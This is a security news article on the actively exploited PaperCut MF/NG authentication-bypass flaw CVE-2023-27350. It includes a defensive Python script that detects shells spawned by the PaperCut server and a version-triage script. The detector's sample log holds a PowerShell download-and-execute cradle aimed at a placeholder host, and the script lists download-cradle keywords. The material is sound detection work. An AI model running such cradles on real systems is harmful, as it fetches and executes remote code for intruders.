Print management software vendor PaperCut has warned that unpatched servers are being actively exploited in the wild. The warning follows two vulnerability reports from cybersecurity firm Trend Micro describing flaws in the PaperCut MF and NG server software.
According to PaperCut, an analysis of customer reports put the earliest signs of suspicious activity linked to these vulnerabilities at April 14, 2023. The more severe of the two is an improper access control flaw tracked as CVE-2023-27350, which carries a CVSS score of 9.8: it lets an unauthenticated remote attacker bypass authentication and execute arbitrary code on the PaperCut server.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has since added the flaw to its Known Exploited Vulnerabilities (KEV) catalog on the strength of the exploitation evidence. Organizations running PaperCut MF or NG should treat reachable servers as at risk, since attackers are using the flaw to gain unauthorized access.
Huntress, another cybersecurity firm, counted roughly 1,800 PaperCut servers exposed to the internet. On compromised instances it observed the PaperCut server process launching PowerShell commands that downloaded and installed remote monitoring and management (RMM) tools, giving the attackers persistent control over the affected systems. In MITRE ATT&CK terms this is initial access through Exploit Public-Facing Application (T1190) followed by Remote Access Software (T1219) for command and control and persistence.
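The behaviour Huntress describes, the PaperCut server process spawning a shell that pulls down a payload, is a straightforward parent/child process detection. The following is an added example, not code from PaperCut or Huntress: it scores process-creation events (Sysmon Event ID 1 style JSON lines) and flags shells or download cradles whose parent is the PaperCut application server. The parent process name pc-app.exe is the PaperCut MF/NG server binary; the sample events are constructed for the demonstration and the download markers are a starting list, not a complete one.

```python
import json
from typing import Iterable, List, Tuple

# Parent process treated as the PaperCut application server (pc-app.exe is the
# PaperCut MF/NG server binary) and the child processes we consider suspicious
# when launched by it. Extend both sets for your environment.
PAPERCUT_SERVER = {"pc-app.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Command-line fragments typical of download cradles and encoded payloads.
DOWNLOAD_MARKERS = (
    "downloadstring", "downloadfile", "invoke-webrequest", "iwr ",
    "invoke-expression", "iex ", "certutil", "bitsadmin", "curl ",
    "-enc ", "-encodedcommand", "frombase64string",
)


def _basename(path: str) -> str:
    """Return the lowercase file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev: dict) -> List[str]:
    """Return the reasons a process-creation event matches the PaperCut chain."""
    parent = _basename(ev.get("ParentImage", ""))
    image = _basename(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "").lower()
    reasons: List[str] = []
    if parent not in PAPERCUT_SERVER:
        return reasons  # only children of the PaperCut server interest us here
    if image in SHELLS:
        reasons.append(f"{parent} spawned {image}")
    markers = [m.strip() for m in DOWNLOAD_MARKERS if m in cmd]
    if markers:
        reasons.append("download/encoded cradle under PaperCut: " + ", ".join(markers))
    return reasons


def find_suspicious(lines: Iterable[str]) -> List[Tuple[dict, List[str]]]:
    """Parse JSON-lines process-creation events; return (event, reasons) for hits."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        reasons = score_event(ev)
        if reasons:
            hits.append((ev, reasons))
    return hits


# Constructed sample telemetry (Sysmon Event ID 1 fields), not real captures.
SAMPLE_LOG = r'''
{"Image": "C:\\Windows\\System32\\notepad.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "notepad.exe"}
{"Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Program Files\\PaperCut MF\\server\\bin\\win\\pc-app.exe", "CommandLine": "cmd.exe /c powershell.exe -nop -w hidden IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"}
{"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Program Files\\PaperCut MF\\server\\bin\\win\\pc-app.exe", "CommandLine": "powershell.exe -EncodedCommand SQBFAFgA"}
{"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe Get-Process"}
'''

if __name__ == "__main__":
    for ev, reasons in find_suspicious(SAMPLE_LOG.splitlines()):
        print(_basename(ev["Image"]), "<-", _basename(ev["ParentImage"]), "|", "; ".join(reasons))
```

Run over the sample, the two events whose parent is pc-app.exe are reported and the two explorer.exe children are ignored, including the legitimate interactive PowerShell session. The same logic maps directly onto a SIEM rule: key on the parent image first, then on shell children and cradle strings in the command line.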
Further investigation of the attackers' infrastructure showed that the domain hosting their tooling was registered only days before the first signs of exploitation. The same domain has also been linked to the TrueBot malware, which points to a coordinated operation rather than opportunistic scanning.
TrueBot is attributed to the Russian-speaking cybercriminal group known as Silence, which has historical ties to the Cl0p ransomware operation. Whether the PaperCut intrusions are feeding ransomware deployment is not yet clear, but the implications for businesses are significant: experts warn that the foothold gained through the PaperCut flaw could serve as a gateway for more damaging payloads inside victim networks.
To mitigate the risk, upgrade PaperCut MF and NG to a patched release: the fix shipped in versions 20.1.7, 21.2.11 and 22.0.9, and every release from 8.0 onward is affected. Servers that are not internet-facing should be patched as well, since the flaw is just as exploitable from inside the network. Where an immediate upgrade is not possible, restrict network access to the server: block inbound connections to the PaperCut web interface (TCP 9191 and 9192 by default) from external IP addresses and, where feasible, allow only the hosts that need to reach it.
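The first step in applying the advice above is knowing which servers are still on an affected build. The following is an added example, not PaperCut's own code: it parses version strings of the kind shown in the product's About page or inventory exports and triages them against the fixed releases named above. The host inventory is constructed for the demonstration; the build numbers in it are placeholders.

```python
import re
from typing import List, Optional, Tuple

# Affected range and fixed releases for CVE-2023-27350 per the PaperCut advisory:
# every release from 8.0 up to the fixed build on its branch is affected, and
# the 8.x-19.x branches received no fix of their own (upgrade is the remedy).
FIRST_AFFECTED = (8, 0, 0)
FIXED_IN = {20: (20, 1, 7), 21: (21, 2, 11), 22: (22, 0, 9)}
FIRST_CLEAN_MAJOR = 23  # later major releases already contain the fix

_VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?")


def parse_version(text: str) -> Optional[Tuple[int, int, int]]:
    """Extract (major, minor, patch) from e.g. 'PaperCut MF 21.2.10 (Build 12345)'."""
    m = _VERSION_RE.search(text)
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def is_vulnerable(text: str) -> Optional[bool]:
    """True if affected and unpatched, False if patched or out of range, None if unparseable."""
    v = parse_version(text)
    if v is None:
        return None
    if v < FIRST_AFFECTED or v[0] >= FIRST_CLEAN_MAJOR:
        return False
    fixed = FIXED_IN.get(v[0])
    if fixed is None:
        return True  # 8.x .. 19.x: no patched build on that branch
    return v < fixed


def triage(inventory: List[Tuple[str, str]]) -> List[Tuple[str, str, str]]:
    """Map (host, version_text) pairs to (host, version_text, verdict)."""
    verdicts = {True: "PATCH", False: "OK", None: "UNKNOWN"}
    return [(host, text, verdicts[is_vulnerable(text)]) for host, text in inventory]


# Constructed inventory for the demonstration (build numbers are placeholders).
INVENTORY = [
    ("print01", "PaperCut MF 21.2.10 (Build 12345)"),
    ("print02", "PaperCut NG 22.0.9 (Build 12346)"),
    ("print03", "PaperCut MF 19.2.3 (Build 12347)"),
    ("print04", "PaperCut MF 7.4 (Build 12348)"),
    ("print05", "version string missing"),
    ("print06", "PaperCut MF 22.1.1 (Build 12349)"),
]

if __name__ == "__main__":
    for host, text, verdict in triage(INVENTORY):
        print(f"{host:8} {verdict:8} {text}")
```

The verdict is about the build only; a server on an affected version that is also reachable on 9191/9192 from untrusted networks should be treated as the top of the list, and any host already flagged PATCH should be checked for the post-exploitation activity described earlier before it is simply upgraded over.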
Separately, Horizon3.ai, a penetration testing firm, has released a proof-of-concept exploit for the critical flaw that demonstrates remote code execution. With a public exploit available, attacks no longer require original research, which raises the urgency for businesses to patch and to hunt for signs of compromise.
Organizations should treat this as a standing requirement rather than a one-off: track newly disclosed vulnerabilities and the KEV catalog, map observed behaviour to frameworks such as MITRE ATT&CK, and act on both before an exposed service becomes an intrusion.